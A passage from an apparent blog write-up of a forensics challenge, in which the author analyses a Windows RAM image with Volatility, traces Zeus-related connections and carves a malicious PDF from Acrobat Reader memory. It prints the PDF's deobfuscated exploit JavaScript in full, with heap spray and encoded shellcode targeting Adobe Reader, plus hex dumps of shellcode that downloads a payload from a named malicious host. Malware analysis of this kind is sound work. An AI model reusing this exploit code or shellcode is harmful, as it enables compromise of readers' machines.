About two weeks ago I returned from the excellent Digital Forensics training in
This post is to describe my approach to that challenge, tools I used and some very dumb mistakes you should not commit after reading it). Nothing sensational, but it maybe helpful to someone just starting his work in digital foremnsics and malware analysis field (like me).
All the tools used below are, for my knowledge, free for personal use and mostly open-source.
Deadline to submit results has passed on April 26, so any further disclosure is completely legit (though you don’t read any further if you want crack this exercise yourself).
So I downloaded the exercise image, fired up the VirtualBox machine with CAINE – excellent set of forensic tools wrapped in Linux LiveCD (which comes handy when analyzing malware – you know, for kids).
So the image is unzipped, loaded in CAINE’s main interface and… fsstat FAIL. OK, maybe I should set the offset, 63 maybe? Nope, still no luck. Maybe Autopsy? The image has loaded and keyword search gave some results, but no partitions discovered, so still no-go. Hmm, let’s review the challenge intro…
Yep, it is RAM image, not HDD image (and yes, now I know I should read the challenge description first, maybe two times in a row). Don’t know any tools to analyze RAM images but Mommy taught me how to google so… download Volatility.
Good thing is that CAINE already has Python included, so I just unzipped it and jumped straight into action:
Let’s check what processes are running
root@caine:python volatility procscan2 –f /path/to/image/hn_forensics >processes.txt
and where do they connect
root@caine:python volatility connscan2 –f /path/to/image/hn_forensics >connections.txt
And what do we see:
Local Address Remote Address Pid
------------------------- ------------------------- ------
192.168.0.176:1176 212.150.164.203:80 888
192.168.0.176:1189 192.168.0.1:9393 1244
192.168.0.176:2869 192.168.0.1:30379 1244
192.168.0.176:2869 192.168.0.1:30380 4
0.0.0.0:0 80.206.204.129:0 0
127.0.0.1:1168 127.0.0.1:1169 888
192.168.0.176:1172 66.249.91.104:80 888
127.0.0.1:1169 127.0.0.1:1168 888
192.168.0.176:1171 66.249.90.104:80 888
192.168.0.176:1178 212.150.164.203:80 1752
192.168.0.176:1184 193.104.22.71:80 880
192.168.0.176:1185 193.104.22.71:80 880
192.168.0.176 is, apparently, the victim’s address, 192.168.0.1 is network gateway (at least, so I guess), 66.249.90.104 is Google.
And everything else is VERY interesting:
2010/02/26_18:04 | search-network-plus.com/ | 212.150.164.203 | - | YES exploit kit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/admin/ | 212.150.164.203 | - | control panel of YES exploit kit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0 | 212.150.164.203 | - | pdf exploit | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | search-network-plus.com/load.php?a=a&e=1 | 212.150.164.203 | - | zeus v2 trojan | Antonio Perino antonioperinom@yahoo.com | 1680 |
2010/02/26_18:04 | - | 193.104.22.71/~produkt/9j856f_4m9y8urb.php | - | zeus v2 drop zone | - | 34305 |
2010/02/26_18:04 | - | 193.104.22.71/~produkt/983745213424/34650798253 | - | zeus v2 config file | - | 34305 |
2010/01/02_07:15 | excellenthostingservice.com/dkir8445g.php | 193.104.22.71 | - | zeus v2 drop zone | Andrey Zubkov / xm@qx8.ru | 34305 |
2009/12/27_11:46 | excellenthostingservice.com/jugd63885.exe | 193.104.22.71 | - | zeus v2 trojan | Andrey Zubkov / xm@qx8.ru | 34305 |
2009/12/27_11:46 | excellenthostingservice.com/kdfjhguv45yt5.bin | 193.104.22.71 | - | zeus v2 config file | Andrey Zubkov / xm@qx8.ru | 34305 |
copyright © 2009 www.malwaredomainlist.com
Looks like someone got himself thunderbolted;)
OK, now what processes do connect to these nasty places?
Not surprisingly, there are:
1752 888 Sat Feb 27 20:12:23 2010 0x02261ac8 0x04040300 AcroRd32.exe
888 1756 Sat Feb 27 20:11:53 2010 0x02268220 0x04040380 firefox.exe
(Acrobat Reader is child of Firefox, which tells us, considering also the briefing, that infection vector was likely a malicious PDF downloaded from the Intertubes) and last but not least
880 688 Fri Feb 26 03:34:07 2010 0x02466a70 0x040400e0 svchost.exe
Lets dump’em down!
root@caine:python volatility procdump –f /path/to/image/hn_forensics –p 1752
volatility: error: Unable to load image. Possible causes: invalid dtb, wrong image type, unsupported image type.
Uh-oh. Same with other processes. So, what image type exactly you don’t like?
root@caine:python volatility ident –f /path/to/image/hn_forensics
IMAGE NAME: /path/to/image/hn_forensics
IMAGE TYPE: UNKNOWN
What do you mean, UNKNOWN?
[…Skipped 2 days of googling, examining the image with hex/binary editor, googling again, downloading and applying countless tools, more googling, finally stumbling upon the image in CAINE file explorer which indicated hn_forensics is actually a tar file]
Enter Bob.vmem
Finally, executables are dumped and sent straight to VirusTotal. 0/40 (actually, svchost.exe got one hit from some obscure CAT AV, but lets count it as false positive). What next?
Maybe, something interesting is in processes memories?
root@caine:python volatility memdmp –f /path/to/image/Bob.vmem –p pid
Now, just opening this dumps in hex/binary editor gives some useful results: you can determine machine and user name (which is Administrator, ah so unwise of you, Bob!), environment variables etc.
And a bit more (here are just some sample strings I found):
Acrord32 (1752)
GET /~produkt/983745213424/34650798253 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 193.104.22.71 (familiar address, heh?)
Pragma: no-cache
w-form-urlencoded
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft.com
Content-Length: 73
Connection: Keep-Alive
Cache-Control: no-cache
MIMETYPE=application/x-silverlight-2&CLSID=application_2F_x-silverlight-2
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php (looks totally benign to me!)
115f8a6b Host: 193.104.22.71
159f5529 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
POST /~produkt/9j856f_4m9y8urb.php HTTP/1.1.
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php
1a80cf51 A V I R A 2 1 0 8
1b11a53f http://193.104.22.71/~produkt/69825439870/73846525#
http://193.104.22.71/~produkt/9j856f_4m9y8urb.php&
1b11a5c7 !*.microsoft.com/
http:/ m\Uffffffff\Uffffffffspac
?odnoklassniki. (Bob, someone misses you in
vko3kte@*/logi
COMPUTERNAME=BOB-DCADFEDC55C
urlmon.dll ObtainUserAgentString
https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
ACustomerServiceMenuEntryPoint?custAction=75
GRABBED TAN
pass
ASKIPPED TAN:
Cookies:
Path: atdmt.com/
MUID=94FE735020664E66A3C9C9D5F41F5B6F
Path: rad.msn.com/
FC00=FB=
FC01=FB=
FC02=FB=
FC03=FB=
FC04=FB=
FC05=FB=
FC06=FB=
FC07=FB=
FC08=FB=
Path: ad.wsod.com/
u_1=4b87435bc9aef
Path: google.com/
PREF=ID=05cbfa879c788048:U=6d9c1ca8f172cf34:TM=1267155808:LM=1267155821:S=HPq9qDiZCOp14r3Q
Path: kontera.com/
cluid=-8245845131267300210411
Path: questionmarket.com/
CS1=707381-23-1
Path: msn.com/
MC1=V=3&GUID=2896b15715de4227be7aa457546a3447
mh=MSFT
CC=US
CULTURE=EN-US
MUID=94FE735020664E66A3C9C9D5F41F5B6F
Path: www.msn.com/
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F
hpcli=W.H|L.|S.|R.|U.L|C.|H.
ushpwea=wc:USNY1232
wpv=2
Path: oldversion.com/
__utma=183186040.157986524.1267155813.1267155813.1267300204.2
__utmz=183186040.1267300204.2.2.utmccn=(organic)|utmcsr=google|utmctr=old+software|utmcmd=organi
https://banking.dee/cgi/ueberweisu
Registered email address*
onClick="javascript:handlePageLink('/internetBanking/RequestRouter?requestCmdId=AccountDetails
Account Name
account-history-wait.jsp" method="post">
id="dgDepositAcctsheader0"*>
You betcha there are some banking troubles!
OK, now we know what are the tricks, but who is playing them? It would be very helpful to take a look at that malicious PDF… Assuming it is in memory (and the briefing strongly hints at that), how can we find it?
Of course, you can dig up PDF format specification and search for headers/footers in dump manually, but isn’t it so 90’s?
One of CAINE’s most useful utilities is FOREMOST – file carving tool that will search the image for all files of some type (executables, web pages, multimedia etc.) by their headers/footers. It is originally intended to be applied to HDD images, but I doesn’t hurt to try on process RAM dump:
root@caine: foremost –t pdf –i /path/to/image/1752.dmp –o 1752
You actually can scan for several or even all types of files, but it takes loads of time and HDD space (there are many false positives like 70 MB gif images and so on) so let’s just stick to pdf for now.
In output folder we have 7 pdf files, 5 of them are slightly more then 400 bytes long (likely FP) and two others are ~60 and ~600 KB, and former is encrypted. Virustotalling gives 0/40 for first and 15/40 for second. Looks like we have a hit.
Now, how can we determine, what vulnerability was exploited and what is the payload? I could just transfer the pdf to windows machine and launch it, but somehow I felt uneasy about it ;). So googling directed me to Didier Stevens blog, which hosts the tools to extract objects (including malware scripts) from PDF files and a screencast on how to use them.
Following screencast instructions I extracted the (probably) malicious Javascript that looked like this:
var xtdxJYVm='0111…<22>…';function yRgjvasM(EajhtdGQ,replace,RzUbJqHU){if(!(replace instanceof Array)){replace=new Array(replace);if(EajhtdGQ instanceof Array){while(EajhtdGQ.length>replace.length){replace[replace.length]=replace[0];}}}if(!(EajhtdGQ instanceof Array))EajhtdGQ=new Array(EajhtdGQ);while(EajhtdGQ.length>replace.length){replace[replace.length]='';}if(RzUbJqHU instanceof Array){for(WsvDXhZg in RzUbJqHU){RzUbJqHU[WsvDXhZg]=yRgjvasM(EajhtdGQ,replace,RzUbJqHU[WsvDXhZg]);}return RzUbJqHU;}for(var WsvDXhZg=0;WsvDXhZg
After some testing in Spidermonkey and adding a } in the end, I submitted it to Wepawet for anlysis.
Deobfuscation result was marked as benign (yes, I believe… believe you are lying!) and looked just a bit less… well, obfuscated:
function OzWJi(rzRoI, fxLUb){
while (rzRoI.length * 2 <>
rzRoI += rzRoI;
}
return rzRoI.substring(0, fxLUb / 2);
}
function bSuTN(){
var Uueqk = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");
var HWXsi = 202116108;
var ZkzwV = [];
var HsVTm = 4194304;
var EgAxi = Uueqk.length * 2;
var fxLUb = HsVTm - (EgAxi + 0x38);
var rzRoI = sly("\u9090\u9090");
rzRoI = OzWJi(rzRoI, fxLUb);
var tfFQG = (HWXsi - 4194304) / HsVTm;
for (var gtqHE = 0; gtqHE <>
ZkzwV[gtqHE] = rzRoI + Uueqk;
}
var eHmqR = sly("\u0c0c\u0c0c");
while (eHmqR.length <>
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : eHmqR
}
);
}
function Soy(){
var dwl = new Array();
function ppu(BtM, dqO){
while (BtM.length * 2 <>
BtM += BtM;
}
BtM = BtM.substring(0, dqO / 2);
return BtM;
}
XrS = 0x30303030;
HRb = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");
var jxU = 4194304;
var RaR = HRb.length * 2;
var dqO = jxU - (RaR + 0x38);
var BtM = sly("\u9090\u9090");
BtM = ppu(BtM, dqO);
var JYD = (XrS - 4194304) / jxU;
for (var Prn = 0; Prn <>
dwl[Prn] = BtM + HRb;
}
var IdI = "66055447950636260127";
for (sly = 0; sly <>
IdI += "3";
}
util.printf("%45000f", IdI);
}
function ynu(shG){
shG = shG.replace(/[\+1]/g, "0");
shG = shG.replace(/[\+2]/g, "9");
shG = shG.replace(/[\+3]/g, "8");
shG = shG.replace(/[\+4]/g, "7");
shG = shG.replace(/[\+5]/g, "6");
shG = shG.replace(/[\+6]/g, "5");
shG = shG.replace(/[\+7]/g, "4");
shG = shG.replace(/[\+8]/g, "3");
shG = shG.replace(/[\+9]/g, "2");
shG = shG.replace(/[\+0]/g, "1");
return shG;
}
function XiIHG(){
var cqcNr = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");
dPl = sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090") + cqcNr;
FQI = sly("\u9090\u9090");
fhT = 5 * 2;
sLa = fhT + dPl.length;
while (FQI.length <>
NJn = FQI.substring(0, sLa);
eUq = FQI.substring(0, FQI.length - sLa);
while (eUq.length + sLa < euq =" eUq">
Cwy = [];
for (XWT = 0; XWT <>
var kKG = 4012;
var LwZ = Array(kKG);
for (XWT = 0; XWT <>
LwZ[XWT] = sly("\u000a\u000a\u000a\u000a");
}
Collab.getIcon(LwZ + "_N.bundle");
}
var sly = unescape, ZgA = app.viewerVersion.toString(), TjP = this ;
if (ZgA <>
bSuTN();
}
if (ZgA >= 8 && ZgA <>
Soy();
}
if (ZgA <= 9){
XiIHG();
}
What next? Yes, submit it to Wepawet again J
And…
Detection results
Detector | Result |
Jsand 1.02.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
ActiveX controls
No objects/controls.
Shellcode and Malware
Hexadecimal | ASCII |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 32 00 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 25 00 30 00 | 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=2..%.0.%. 0.%.0.%.0.%.0.%. 0. |
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 33 00 00 34 13 34 13 | ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=3..4.4. |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31 52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8 98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04 68 74 74 70 3a 2f 2f 73 65 61 72 63 68 2d 6e 65 74 77 6f 72 6b 2d 70 6c 75 73 2e 63 6f 6d 2f 6c 6f 61 64 2e 70 68 70 3f 61 3d 61 26 73 74 3d 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 36 2e 30 26 65 3d 31 00 00 00 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 23 00 26 00 | 3.d.@0x..@..p... X....@4.@|.X ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f..l...Phon .dhurlmT..N...U. .P3.PPV.U......1 RP.6./p.U.[3.WV. .....U.W....`.U. http://search-ne twork-plus.com/l oad.php?a=a&st=I nternet Explorer 6.0&e=1....#.&. #.&.#.&.#.&.#.&. #.&.#.&.#.&.#.&. #.&. |
Additional (potential) malware:
URL | Type | Hash | Analysis |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1 | N/A | N/A | |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2 | N/A | N/A | |
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3 | N/A | N/A | |
DING-DING-DING! JACKPOT!!!
We got deobfuscated shellcode and payload URLs. That’s pretty much everything we need for now. Of course, you should also review what files and registry entries are created and investigate into the service apparently created by malware (remember that svchost.exe?) but that is pretty straightforward using Volatility and you can figure it out yourself.
Hope this was an amusing story or at least helpful.